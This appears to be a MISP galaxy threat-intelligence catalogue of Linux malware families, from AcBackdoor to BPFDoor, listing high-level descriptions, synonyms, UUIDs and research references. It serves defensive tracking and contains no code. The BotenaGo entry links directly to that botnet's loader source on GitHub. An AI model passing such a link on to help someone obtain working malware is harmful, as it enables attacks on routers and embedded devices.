- https://malpedia.caad.fkie.fraunhofer.de/details/elf.acbackdoor - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://medium.com/@Ilandu/portdoor-malware-afc9d0796cba - webarchive
- https://www.bleepingcomputer.com/news/security/linux-windows-users-targeted-with-new-acbackdoor-malware/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AcidPour
Internal MISP references
UUID 11981e96-be46-4ce9-8085-af7224591951
which can be used as unique global reference for AcidPour
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AcidRain
A MIPS ELF binary with wiper functionality used against Viasat KA-SAT modems.
Internal MISP references
UUID 6108aa3d-ea6e-47fd-9344-d333b07f5a56
which can be used as unique global reference for AcidRain
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.acidrain - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war - webarchive
- https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/ - webarchive
- https://www.splunk.com/en_us/blog/security/threat-update-acidrain-wiper.html - webarchive
- https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works - webarchive
- https://www.trellix.com/blogs/research/pouring-acid-rain/ - webarchive
- https://www.youtube.com/watch?v=mrTdSdMMgnk - webarchive
- https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat - webarchive
- https://www.bleepingcomputer.com/news/security/viasat-confirms-satellite-modems-were-wiped-with-acidrain-malware/ - webarchive
- https://www.sentinelone.com/labs/acidrain-a-modem-wiper-rains-down-on-europe/ - webarchive
- https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html - webarchive
- https://www.reversemode.com/2022/03/viasat-incident-from-speculation-to.html - webarchive
- https://cybersecuritynews.com/acidrain-wiper-malware/ - webarchive
- https://www.techtimes.com/articles/273755/20220331/viasat-hit-russia-s-wiper-malware-called-acidrain-affecting-european.htm - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AgeLocker
Internal MISP references
UUID 5d04aac3-fdf5-4922-9976-3a5a75e96e1a
which can be used as unique global reference for AgeLocker
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.age_locker - webarchive
- https://therecord.media/qnap-warns-of-agelocker-ransomware-attacks-against-nas-devices/ - webarchive
- https://twitter.com/IntezerLabs/status/1326880812344676352 - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AirDropBot
AirDropBot is used to create a DDoS botnet. It spreads as a worm, currently targeting Linksys routers. Backdoor and other bot functionality is present in this family. Development seems to be ongoing.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular AirDropBot.
Known Synonyms |
---|
CloudBot |
Internal MISP references
UUID e91fcb82-e788-44cb-be5d-73b9601b9533
which can be used as unique global reference for AirDropBot
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Aisuru
Honeypot-aware variant of Mirai.
Internal MISP references
UUID e288425b-40f0-441e-977f-5f1264ed61b6
which can be used as unique global reference for Aisuru
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Akira (ELF)
Ransomware
Internal MISP references
UUID 365081b9-f60d-4484-befa-d4fc9d0f55d7
which can be used as unique global reference for Akira (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira - webarchive
- https://www.microsoft.com/en-us/security/blog/2023/10/11/automatic-disruption-of-human-operated-attacks-through-containment-of-compromised-user-accounts/ - webarchive
- https://arcticwolf.com/resources/blog/arctic-wolf-labs-observes-increased-fog-and-akira-ransomware-activity-linked-to-sonicwall-ssl-vpn/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/research/akira-ransomware.html - webarchive
- https://www.loginsoft.com/post/akira-ransomware-the-evolution-of-a-major-threat - webarchive
- https://labs.k7computing.com/index.php/akiras-play-with-linux/ - webarchive
- https://medium.com/@DCSO_CyTec/unransomware-from-zero-to-full-recovery-in-a-blink-8a47dd031df3 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AnchorDNS
Backdoor deployed by the TrickBot actors. It uses DNS as the command and control channel as well as for exfiltration of data.
Internal MISP references
UUID b88dc3ec-d94c-4e6e-a846-5d07130df550
which can be used as unique global reference for AnchorDNS
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.anchor_dns - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://securityintelligence.com/posts/new-malware-trickbot-anchordns-backdoor-upgrades-anchormail/ - webarchive
- https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/ - webarchive
- https://medium.com/stage-2-security/anchor-dns-malware-family-goes-cross-platform-d807ba13ca30 - webarchive
- https://us-cert.cisa.gov/sites/default/files/publications/AA20-302A_Ransomware%20_Activity_Targeting_the_Healthcare_and_Public_Health_Sector.pdf - webarchive
- https://hello.global.ntt/en-us/insights/blog/trickbot-variant-communicating-over-dns - webarchive
- https://cyware.com/news/trickbots-anchordns-is-now-upgraded-to-anchormail-a21f5490/ - webarchive
- https://www.domaintools.com/resources/blog/finding-anchordns-c2s-with-iris-investigate - webarchive
- https://www.netscout.com/blog/asert/dropping-anchor - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
ANGRYREBEL
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular ANGRYREBEL.
Known Synonyms |
---|
Ghost RAT |
Internal MISP references
UUID 6cb47609-b03e-43d9-a4c7-8342f1011f3b
which can be used as unique global reference for ANGRYREBEL
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
AVrecon
AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfigurations of the targeted devices. Once deployed, AVrecon collects some information about the infected device, opens a session to a pre-configured C&C server, and spawns a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.
Internal MISP references
UUID 1b218432-dd5c-4593-8f37-e202f9418fff
which can be used as unique global reference for AVrecon
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon - webarchive
- https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/ - webarchive
- https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/ - webarchive
- https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/ - webarchive
- https://twitter.com/BlackLotusLabs/status/1684290046235484160 - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
azazel
Azazel is a Linux user-mode rootkit based on a technique from the Jynx rootkit (the LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features.
Internal MISP references
UUID 37374572-3346-4c00-abc9-9f6883c8866e
which can be used as unique global reference for azazel
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
B1txor20
B1txor20 is a malware that was discovered by 360 Netlab among other malware exploiting Log4J. The name is derived from the file name "b1t", the XOR encryption algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab, this backdoor for the Linux platform uses a DNS tunnel to build a C2 communication channel. They also assumed that the malware is still in development, because of some bugs and not fully implemented features.
Internal MISP references
UUID 05e6d9ff-93a1-429b-b856-794d9ded75df
which can be used as unique global reference for B1txor20
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Babuk (ELF)
ESX and NAS modules for Babuk ransomware.
Internal MISP references
UUID 26b4d805-890b-4767-9d9f-a08adeee1c96
which can be used as unique global reference for Babuk (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/ - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/ - webarchive
- https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
- https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings - webarchive
- https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Backdoorit
According to Avast Decoded, Backdoorit is a multiplatform RAT written in the Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Backdoorit.
Known Synonyms |
---|
backd00rit |
Internal MISP references
UUID 4a4bc444-9e93-47a6-a572-0e13f743d875
which can be used as unique global reference for Backdoorit
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Irc16
Internal MISP references
UUID 3008fa01-492a-42e2-ab9b-a0a9d12823b8
which can be used as unique global reference for Irc16
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BADCALL (ELF)
BADCALL is a Trojan malware variant used by the Lazarus Group.
Internal MISP references
UUID 350817e8-4d70-455e-b1fd-000bed4a4cf4
which can be used as unique global reference for BADCALL (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bashlite
Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bashlite.
Known Synonyms |
---|
Gafgyt |
gayfgt |
lizkebab |
qbot |
torlus |
Internal MISP references
UUID 81917a93-6a70-4334-afe2-56904c1fafe9
which can be used as unique global reference for Bashlite
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite - webarchive
- https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora - webarchive
- https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218 - webarchive
- https://securityscorecard.com/wp-content/uploads/2024/01/Report-A-Detailed-Analysis-Of-The-Gafgyt-Malware-Targeting-IoT-Devices.pdf - webarchive
- https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf - webarchive
- https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/ - webarchive
- https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/ - webarchive
- https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt - webarchive
- https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/ - webarchive
- https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group - webarchive
- https://vb2020.vblocalhost.com/uploads/VB2020-Liu.pdf - webarchive
- https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/ - webarchive
- https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf - webarchive
- https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/ - webarchive
- https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/ - webarchive
- https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/ - webarchive
- https://info.spamhaus.com/hubfs/Botnet%20Reports/Jan-Jun%202024%20Botnet%20Threat%20Update.pdf - webarchive
- http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/ - webarchive
- https://blog.cyber5w.com/gafgyt-backdoor-analysis - webarchive
- https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/ - webarchive
- https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/ - webarchive
- https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/ - webarchive
- https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/ - webarchive
- https://www.aquasec.com/blog/gafgyt-malware-variant-exploits-gpu-power-and-cloud-native-environments/ - webarchive
- https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/ - webarchive
- https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BCMPUPnP_Hunter
Internal MISP references
UUID d8dd47a5-85fe-4f07-89dc-00301468d209
which can be used as unique global reference for BCMPUPnP_Hunter
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BianLian (ELF)
Internal MISP references
UUID f6be433e-7ed0-4777-876b-e3e2ba7d5c7f
which can be used as unique global reference for BianLian (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bianlian - webarchive
- https://blog.talosintelligence.com/talos-ir-q2-2023-quarterly-recap/ - webarchive
- https://rhisac.org/threat-intelligence/bianlian-ransomware-expanding-c2-infrastructure-and-operational-tempo/ - webarchive
- https://www.youtube.com/live/O2Wx7mQHR2I?si=uydJupvHK6sxxw3n - webarchive
- https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BiBi-Linux
According to Security Joes, this malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions. During execution, it produces extensive output, which can be mitigated using the "nohup" command. It also leverages multiple threads and a queue to corrupt files concurrently, enhancing its speed and reach. Its actions include overwriting files, renaming them with a random string containing "BiBi," and excluding certain file types from corruption.
Internal MISP references
UUID efec7bb0-4ec7-4c97-a8a9-28e0fea19852
which can be used as unique global reference for BiBi-Linux
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Bifrost
Linux version of the bifrose malware that originally targeted the Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Bifrost.
Known Synonyms |
---|
elf.bifrose |
Internal MISP references
UUID 8fa6dd0e-b630-419f-bd01-5271dd8f27c6
which can be used as unique global reference for Bifrost
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost - webarchive
- https://twitter.com/strinsert1Na/status/1595553530579890176 - webarchive
- https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/ - webarchive
- https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/ - webarchive
- https://jp.security.ntt/resources/EN-BlackTech_2021.pdf - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BigViktor
A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.
Internal MISP references
UUID 901ab128-2d23-41d7-a9e7-6a34e281804e
which can be used as unique global reference for BigViktor
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BioSet
Internal MISP references
UUID 8e301f58-acef-48e7-ad8b-c27d3ed38eed
which can be used as unique global reference for BioSet
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Black Basta (ELF)
ESXi encrypting ransomware, using a combination of the stream cipher ChaCha20 and RSA.
Internal MISP references
UUID 35c86fef-18fe-491c-ad3c-13f98e8f5584
which can be used as unique global reference for Black Basta (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackbasta - webarchive
- https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-131a - webarchive
- https://www.rapid7.com/blog/post/2024/05/10/ongoing-social-engineering-campaign-linked-to-black-basta-ransomware-operators/ - webarchive
- https://quadrantsec.com/resource/technical-analysis/black-basta-malware-overview - webarchive
- https://www.cynet.com/blog/orion-threat-alert-qakbot-ttps-arsenal-and-the-black-basta-ransomware/ - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://stairwell.com/resources/stairwell-threat-report-black-basta-overview-and-detection-rules/ - webarchive
- https://www.microsoft.com/en-us/security/blog/2024/07/29/ransomware-operators-exploit-esxi-hypervisor-vulnerability-for-mass-encryption/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackCat (ELF)
ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.
ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BlackCat (ELF).
Known Synonyms |
---|
ALPHV |
Noberus |
Internal MISP references
UUID 860e9d03-830e-4410-ac89-75b6eb89e7e5
which can be used as unique global reference for BlackCat (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat - webarchive
- https://killingthebear.jorgetesta.tech/actors/alphv - webarchive
- https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v - webarchive
- https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/ - webarchive
- https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01 - webarchive
- https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html - webarchive
- https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf - webarchive
- https://blog.group-ib.com/blackcat - webarchive
- https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3 - webarchive
- https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/ - webarchive
- https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/ - webarchive
- https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf - webarchive
- https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/ - webarchive
- https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/ - webarchive
- https://securelist.com/a-bad-luck-blackcat/106254/ - webarchive
- https://www.forescout.com/resources/analysis-of-an-alphv-incident - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous - webarchive
- https://securelist.com/new-ransomware-trends-in-2022/106457/ - webarchive
- https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive - webarchive
- https://www.intrinsec.com/alphv-ransomware-gang-analysis/ - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments - webarchive
- https://twitter.com/sisoma2/status/1473243875158499330 - webarchive
- https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/ - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/ - webarchive
- https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/ - webarchive
- https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackMatter (ELF)
Internal MISP references
UUID 1277a4bf-466c-40bc-b000-f55cbd0994a7
which can be used as unique global reference for BlackMatter (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter - webarchive
- https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751 - webarchive
- https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/ - webarchive
- https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf - webarchive
- https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/ - webarchive
- https://blog.group-ib.com/blackmatter2 - webarchive
- https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/ - webarchive
- https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/ - webarchive
- https://twitter.com/VK_Intel/status/1423188690126266370 - webarchive
- https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group - webarchive
- https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/ - webarchive
- https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2 - webarchive
- https://us-cert.cisa.gov/ncas/alerts/aa21-291a - webarchive
- https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor - webarchive
- https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf - webarchive
- https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/ - webarchive
- https://www.mandiant.com/resources/chasing-avaddon-ransomware - webarchive
- https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html - webarchive
- https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/ - webarchive
- https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d - webarchive
- https://twitter.com/GelosSnake/status/1451465959894667275 - webarchive
- https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html - webarchive
- https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself - webarchive
- https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service - webarchive
- https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/ - webarchive
- https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/ - webarchive
- https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html - webarchive
- https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf - webarchive
- https://www.youtube.com/watch?v=NIiEcOryLpI - webarchive
- https://blog.group-ib.com/blackmatter# - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Blackrota
Internal MISP references
UUID a30aedcc-562e-437a-827c-55bc00cf3506
which can be used as unique global reference for Blackrota
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackrota - webarchive
- https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go-en/ - webarchive
- https://www.kryptoslogic.com/blog/2020/12/automated-string-de-gobfuscation/ - webarchive
- https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BlackSuit (ELF)
According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.
Internal MISP references
UUID 5bdbeaae-0def-4547-9940-33ad94060955
which can be used as unique global reference for BlackSuit (ELF)
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BOLDMOVE (ELF)
According to Mandiant, this malware family is attributed to actors with a potential Chinese background and is directly related to observed exploitation of Fortinet's SSL-VPN (CVE-2022-42475). There is also a Windows variant.
Internal MISP references
UUID 8f347147-c34e-4698-9439-c640233fca15
which can be used as unique global reference for BOLDMOVE (ELF)
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove - webarchive
- https://services.google.com/fh/files/misc/01-chinese-espionage-article-m-trends-2024.pdf - webarchive
- https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html - webarchive
- https://www.ncsc.nl/binaries/ncsc/documenten/publicaties/2024/februari/6/mivd-aivd-advisory-coathanger-tlp-clear/TLP-CLEAR+MIVD+AIVD+Advisory+COATHANGER.pdf - webarchive
- https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
Break out the Box
This is a pentesting tool and, according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies."
It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Break out the Box.
Known Synonyms |
---|
BOtB |
Internal MISP references
UUID 57c9ab70-7133-441a-af66-10c0e4eb898b
which can be used as unique global reference for Break out the Box
in MISP communities and other software using the MISP galaxy
External references
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BotenaGo
According to Alien Labs, this malware targets embedded devices including routers with more than 30 exploits. SourceCode: https://github.com/Egida/kek/blob/19991ef983f838287aa9362b78b4ed8da0929184/loader_multi.go (2021-10-16)
Internal MISP references
UUID dffcc168-cb76-4ae6-b913-c369e92c614b
which can be used as unique global reference for BotenaGo
in MISP communities and other software using the MISP galaxy
External references
- https://malpedia.caad.fkie.fraunhofer.de/details/elf.botenago - webarchive
- https://cybersecurity.att.com/blogs/labs-research/shikitega-new-stealthy-malware-targeting-linux - webarchive
- https://www.nozominetworks.com/blog/new-botenago-variant-discovered-by-nozomi-networks-labs/ - webarchive
- https://cybersecurity.att.com/blogs/labs-research/botenago-strike-again-malware-source-code-uploaded-to-github - webarchive
- https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits - webarchive
- https://lifars.com/2022/01/newly-found-malware-threatens-iot-devices/ - webarchive
Associated metadata
Metadata key | Value |
---|---|
type | [] |
BPFDoor
BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant.
Synonyms
"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular BPFDoor.
Known Synonyms |
---|
JustForFun |
Internal MISP references
UUID 3c7082b6-0181-4064-8e35-ab522b49200f
which can be used as unique global reference for BPFDoor
in MISP communities and other software using the MISP galaxy
External references
